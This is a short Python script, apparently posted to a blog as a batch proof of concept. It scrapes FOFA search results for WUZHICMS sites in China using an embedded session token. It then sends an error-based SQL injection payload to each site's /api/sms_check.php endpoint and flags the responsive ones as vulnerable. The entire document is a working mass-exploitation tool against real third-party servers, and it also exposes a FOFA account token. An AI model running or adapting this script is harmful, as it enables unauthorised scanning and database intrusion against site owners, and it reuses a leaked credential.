import base64 import requests from lxml import etree import time headers = { 'cookie':'fofa_token=eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MTY1NjQwLCJtaWQiOjEwMDA5NjQzMywidXNlcm5hbWUiOiJ0dXNpIiwiZXhwIjoxNjgwMTcwMTY3fQ.HKiAP08lKOwiFp_9tBHg0SqDKn6n_e9dTgLlAl2wxLYHTdLg5cK1PslhwWe99jOFaI41mosUCr3xGX0kbi87ww' } search_data='app="WUZHICMS" && country="CN"' for yeshu in range(1,5): url = 'https://fofa.info/result?page=' + str(yeshu) + '&qbase64=' search_data_bs = str(base64.b64encode(search_data.encode('utf-8')), 'utf-8') urls=url+search_data_bs try: print('正在提取第' + str(yeshu) + '页') result = requests.get(urls, headers=headers, verify=False).content # print(urls) # print(result.decode('utf-8')) soup = etree.HTML(result) ip_data = soup.xpath('//a[@target="_blank"]/@href') ipdata = '\n'.join(ip_data) print(ipdata) with open(r'ip.txt', 'a+') as f: f.write(ipdata + '\n') f.close() except Exception as e: time.sleep('0.5') pass payload = '/api/sms_check.php?param=1%27%20or%20extractvalue(1,concat(0x7e,(select%20database())))%23' for ip in open('ip.txt'): ip = ip.replace('\n', '') url = ip + payload try: res = requests.get(url, headers=headers, verify=False) if '~' in res.content.decode("utf-8"): print(url+ '|ok') else: print(url+ '|no') time.sleep(0.5) except Exception as e: pass
fofa批量测试cms_poc
于 2023-06-07 15:49:21 首次发布